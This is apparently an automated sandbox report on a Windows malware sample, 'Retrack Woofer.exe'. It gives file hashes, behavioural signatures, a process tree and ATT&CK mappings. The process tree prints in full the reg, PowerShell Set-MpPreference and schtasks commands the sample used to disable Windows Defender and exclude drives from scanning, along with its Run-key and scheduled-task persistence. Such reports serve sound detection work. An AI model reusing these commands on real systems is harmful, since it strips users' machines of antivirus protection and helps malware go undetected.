Analysis
max time kernel: 89s
max time network: 99s
platform: windows10-2004_x64
resource: win10v2004-20240704-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240704-en, locale:en-us, os:windows10-2004-x64, system
submitted: 07/07/2024, 12:49
Static task: static1
Behavioral task: behavioral1
Sample: Retrack Woofer.exe
Resource: win7-20240705-en
General
Target: Retrack Woofer.exe
Size: 804KB
MD5: ae3f1e9ec89b546f4542ab3b3df5f593
SHA1: 578044dc221016ef0a09fef215f731170fbfe6cd
SHA256: 8af4c53b8010c14e5a07c9f72ec0172588ef13d7aa04afa1332666732d95cb0f
SHA512: 57ff387cd6a66e5fe312b0ce383f5423625d20e0f9d1ecdf78e52c729ff9d73feaaec4751450f152be313793fe8dc3d4c656be802e0f8f876d36e65564eeb2b3
SSDEEP: 24576:06mTXNe2tyyucITeGvlC6g9joXzFqeECi:lmhrClF9DzzF8
Malware Config
Signatures
Contains code to disable Windows Defender (1 IoCs)
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource | yara_rule
behavioral2/files/0x00070000000234c6-33.dat | disable_win_def

Modifies Windows Defender Real-time Protection settings
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | WScript.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | WScript.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | WScript.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | WScript.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | reg.exe

Modifies security service (2 TTPs, 1 IoCs)
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | reg.exe

Checks computer location settings (2 TTPs, 3 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-771719357-2485960699-3367710044-1000\Control Panel\International\Geo\Nation | Retrack Woofer.exe
Key value queried | \REGISTRY\USER\S-1-5-21-771719357-2485960699-3367710044-1000\Control Panel\International\Geo\Nation | WScript.exe
Key value queried | \REGISTRY\USER\S-1-5-21-771719357-2485960699-3367710044-1000\Control Panel\International\Geo\Nation | WScript.exe

Executes dropped EXE (3 IoCs)
pid | Process
3632 | Plugin (2).exe
5072 | UpdateService.exe
112 | Retrack spoof.exe

Adds Run key to start application (2 TTPs, 1 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\DDP Host = "C:\\Program Files (x86)\\DDP Host\\ddphost.exe" | UpdateService.exe

Checks whether UAC is enabled
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | UpdateService.exe

Drops file in Program Files directory (2 IoCs)
description | ioc | Process
File opened for modification | C:\Program Files (x86)\DDP Host\ddphost.exe | UpdateService.exe
File created | C:\Program Files (x86)\DDP Host\ddphost.exe | UpdateService.exe

Drops file in Windows directory (4 IoCs)
description | ioc | Process
File created | C:\Windows\Plugin (2).exe | Retrack Woofer.exe
File created | C:\Windows\Plugin.vbs | Retrack Woofer.exe
File created | C:\Windows\UpdateService.exe | Retrack Woofer.exe
File created | C:\Windows\Retrack spoof.exe | Retrack Woofer.exe

Command and Scripting Interpreter: PowerShell
pid | Process
1060 | powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash (1 IoCs)
pid | pid_target | Process | procid_target
2060 | 112 | WerFault.exe | 91

Enumerates system info in registry (2 TTPs, 3 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe

Modifies data under HKEY_USERS (2 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | chrome.exe
Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133648302634227806" | chrome.exe

Modifies registry class (1 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-771719357-2485960699-3367710044-1000_Classes\Local Settings | Retrack Woofer.exe

Scheduled Task/Job: Scheduled Task (1 TTPs, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
4232 | schtasks.exe
1704 | schtasks.exe

Suspicious behavior: EnumeratesProcesses (61 IoCs)
pid | Process | occurrences
1060 | powershell.exe | 2
4208 | powershell.exe | 4
460 | powershell.exe | 4
1964 | powershell.exe | 4
1540 | powershell.exe | 3
2804 | powershell.exe | 3
4984 | powershell.exe | 3
3524 | powershell.exe | 3
2416 | powershell.exe | 3
216 | powershell.exe | 3
4412 | powershell.exe | 3
1712 | powershell.exe | 3
5072 | UpdateService.exe | 20
2244 | chrome.exe | 3

Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
pid | Process
5072 | UpdateService.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (7 IoCs)
pid | Process | occurrences
2244 | chrome.exe | 7

Suspicious use of AdjustPrivilegeToken (64 IoCs)
description | pid | Process | occurrences
Token: SeDebugPrivilege | 1060 | powershell.exe | 1
Token: SeDebugPrivilege | 4208 | powershell.exe | 1
Token: SeDebugPrivilege | 1964 | powershell.exe | 1
Token: SeDebugPrivilege | 460 | powershell.exe | 1
Token: SeDebugPrivilege | 1540 | powershell.exe | 1
Token: SeDebugPrivilege | 2804 | powershell.exe | 1
Token: SeDebugPrivilege | 4984 | powershell.exe | 1
Token: SeDebugPrivilege | 3524 | powershell.exe | 1
Token: SeDebugPrivilege | 4412 | powershell.exe | 1
Token: SeDebugPrivilege | 1712 | powershell.exe | 1
Token: SeDebugPrivilege | 2416 | powershell.exe | 1
Token: SeDebugPrivilege | 216 | powershell.exe | 1
Token: SeDebugPrivilege | 5072 | UpdateService.exe | 2
Token: SeShutdownPrivilege | 2244 | chrome.exe | 25
Token: SeCreatePagefilePrivilege | 2244 | chrome.exe | 25
The chrome.exe entries alternate between SeShutdownPrivilege and SeCreatePagefilePrivilege.

Suspicious use of FindShellTrayWindow (26 IoCs)
pid | Process | occurrences
2244 | chrome.exe | 26

Suspicious use of SendNotifyMessage (24 IoCs)
pid | Process | occurrences
2244 | chrome.exe | 24

Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target | occurrences
PID 3760 wrote to memory of 1060 | 3760 | Retrack Woofer.exe | 84 | 2
PID 3760 wrote to memory of 3632 | 3760 | Retrack Woofer.exe | 86 | 3
PID 3760 wrote to memory of 5008 | 3760 | Retrack Woofer.exe | 135 | 2
PID 3760 wrote to memory of 5072 | 3760 | Retrack Woofer.exe | 89 | 3
PID 3760 wrote to memory of 112 | 3760 | Retrack Woofer.exe | 91 | 3
PID 5008 wrote to memory of 844 | 5008 | WScript.exe | 92 | 2
PID 844 wrote to memory of 4208 | 844 | WScript.exe | 93 | 2
PID 3632 wrote to memory of 652 | 3632 | Plugin (2).exe | 94 | 2
PID 844 wrote to memory of 1964 | 844 | WScript.exe | 96 | 2
PID 844 wrote to memory of 460 | 844 | WScript.exe | 98 | 2
PID 844 wrote to memory of 2804 | 844 | WScript.exe | 100 | 2
PID 844 wrote to memory of 1540 | 844 | WScript.exe | 102 | 2
PID 844 wrote to memory of 4984 | 844 | WScript.exe | 104 | 2
PID 844 wrote to memory of 3524 | 844 | WScript.exe | 106 | 2
PID 652 wrote to memory of 4888 | 652 | cmd.exe | 107 | 2
PID 844 wrote to memory of 4412 | 844 | WScript.exe | 109 | 2
PID 844 wrote to memory of 1712 | 844 | WScript.exe | 111 | 2
PID 844 wrote to memory of 2416 | 844 | WScript.exe | 113 | 2
PID 844 wrote to memory of 216 | 844 | WScript.exe | 115 | 2
PID 652 wrote to memory of 2592 | 652 | cmd.exe | 126 | 2
PID 652 wrote to memory of 3096 | 652 | cmd.exe | 118 | 2
PID 652 wrote to memory of 2052 | 652 | cmd.exe | 119 | 2
PID 5072 wrote to memory of 4232 | 5072 | UpdateService.exe | 120 | 3
PID 652 wrote to memory of 2716 | 652 | cmd.exe | 122 | 2
PID 652 wrote to memory of 4964 | 652 | cmd.exe | 124 | 2
PID 652 wrote to memory of 2060 | 652 | cmd.exe | 139 | 2
PID 652 wrote to memory of 5048 | 652 | cmd.exe | 127 | 2
PID 652 wrote to memory of 988 | 652 | cmd.exe | 128 | 2
PID 5072 wrote to memory of 1704 | 5072 | UpdateService.exe | 129 | 3
PID 652 wrote to memory of 3544 | 652 | cmd.exe | 131 | 1
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
(Tree order; each child is indented under its parent. Level numbers from the report are rendered as indentation.)

C:\Users\Admin\AppData\Local\Temp\Retrack Woofer.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Retrack Woofer.exe"
  - Checks computer location settings
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID: 3760

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAeAB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AYQB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAcABkACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAcwBmACMAPgA="
    Decoded (base64, UTF-16LE): <#gxz#>Add-MpPreference <#max#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#qpd#> -Force <#tsf#>
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 1060

  C:\Windows\Plugin (2).exe
    Command line: "C:\Windows\Plugin (2).exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID: 3632

    C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\EA50.tmp\EA61.tmp\EA62.bat "C:\Windows\Plugin (2).exe""
      - Suspicious use of WriteProcessMemory
      PID: 652

      C:\Windows\system32\reg.exe
        Command line: reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
        - Modifies Windows Defender Real-time Protection settings
        PID: 4888

      C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        PID: 2592

      C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
        PID: 3096

      C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
        PID: 2052

      C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        - Modifies Windows Defender Real-time Protection settings
        PID: 2716

      C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
        - Modifies Windows Defender Real-time Protection settings
        PID: 4964

      C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        - Modifies Windows Defender Real-time Protection settings
        PID: 2060

      C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        - Modifies Windows Defender Real-time Protection settings
        PID: 5048

      C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        - Modifies Windows Defender Real-time Protection settings
        PID: 988

      C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
        PID: 3544

      C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
        PID: 1952

      C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
        PID: 3964

      C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
        PID: 3268

      C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
        PID: 5008

      C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
        PID: 1612

      C:\Windows\system32\schtasks.exe
        Command line: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
        PID: 2196

      C:\Windows\system32\schtasks.exe
        Command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
        PID: 2268

      C:\Windows\system32\schtasks.exe
        Command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
        PID: 2464

      C:\Windows\system32\schtasks.exe
        Command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
        PID: 2272

      C:\Windows\system32\schtasks.exe
        Command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
        PID: 3740

      C:\Windows\system32\reg.exe
        Command line: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
        PID: 3032

      C:\Windows\system32\reg.exe
        Command line: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
        PID: 964

      C:\Windows\system32\reg.exe
        Command line: reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
        PID: 2292

      C:\Windows\system32\reg.exe
        Command line: reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
        PID: 4676

      C:\Windows\system32\reg.exe
        Command line: reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
        PID: 4600

      C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
        PID: 1216

      C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
        PID: 2200

      C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
        PID: 4612

      C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
        PID: 2660

      C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
        - Modifies security service
        PID: 5104
  C:\Windows\System32\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Windows\Plugin.vbs"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID: 5008

    C:\Windows\System32\WScript.exe
      Command line: "C:\Windows\System32\WScript.exe" "C:\Windows\Plugin.vbs" /elevate
      - Modifies Windows Defender Real-time Protection settings
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory
      PID: 844

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 4208

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 1964

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 460

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 2804

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 1540

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 4984

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 3524

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 4412

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 1712

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 2416

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 216
  C:\Windows\UpdateService.exe
    Command line: "C:\Windows\UpdateService.exe"
    - Executes dropped EXE
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 5072

    C:\Windows\SysWOW64\schtasks.exe
      Command line: "schtasks.exe" /create /f /tn "DDP Host" /xml "C:\Users\Admin\AppData\Local\Temp\tmp15D5.tmp"
      - Scheduled Task/Job: Scheduled Task
      PID: 4232

    C:\Windows\SysWOW64\schtasks.exe
      Command line: "schtasks.exe" /create /f /tn "DDP Host Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp1CAC.tmp"
      - Scheduled Task/Job: Scheduled Task
      PID: 1704

  C:\Windows\Retrack spoof.exe
    Command line: "C:\Windows\Retrack spoof.exe"
    - Executes dropped EXE
    PID: 112

    C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 112 -s 1048
      - Program crash
      PID: 2060

C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 112 -ip 112
  PID: 2592

C:\Program Files\Google\Chrome\Application\chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe"
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID: 2244

  C:\Program Files\Google\Chrome\Application\chrome.exe
    Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb1affab58,0x7ffb1affab68,0x7ffb1affab78
    PID: 2076

  C:\Program Files\Google\Chrome\Application\chrome.exe
    Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1772 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:2
    PID: 4912

  C:\Program Files\Google\Chrome\Application\chrome.exe
    Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:8
    PID: 1596

  C:\Program Files\Google\Chrome\Application\chrome.exe
    Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2280 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:8
    PID: 3140

  C:\Program Files\Google\Chrome\Application\chrome.exe
    Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3144 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:1
    PID: 3348

  C:\Program Files\Google\Chrome\Application\chrome.exe
    Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3176 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:1
    PID: 1584

  C:\Program Files\Google\Chrome\Application\chrome.exe
    Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4404 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:1
    PID: 3312

  C:\Program Files\Google\Chrome\Application\chrome.exe
    Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4704 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:8
    PID: 4004

  C:\Program Files\Google\Chrome\Application\chrome.exe
    Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4836 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:8
    PID: 4668

  C:\Program Files\Google\Chrome\Application\chrome.exe
    Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5084 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:1
    PID: 244

  C:\Program Files\Google\Chrome\Application\chrome.exe
    Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4844 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:1
    PID: 364

  C:\Program Files\Google\Chrome\Application\chrome.exe
    Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3188 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:1
    PID: 4540

  C:\Program Files\Google\Chrome\Application\chrome.exe
    Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=2752 --field-trial-handle=1992,i,10873951759385171277,7885255491642300329,131072 /prefetch:1
    PID: 3444

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
  Command line: "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
  PID: 3460
Network
MITRE ATT&CK Enterprise v15
Execution
  Command and Scripting Interpreter (1)
    PowerShell (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Persistence
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (2)
    Windows Service (2)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Downloads
Filesize: 2B
MD5: d751713988987e9331980363e24189ce
SHA1: 97d170e1550eee4afc0af065b78cda302a97674c
SHA256: 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512: b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Filesize: 6KB
MD5: 9e415fb92af655729108cac5449c9528
SHA1: d8db8cd1dba607744e0c0ec7050ed3ee5efd19d5
SHA256: 1c3c5e0350a1b4b455ca91a0c5846a2342462450e1e26d24b39d9f4264f27657
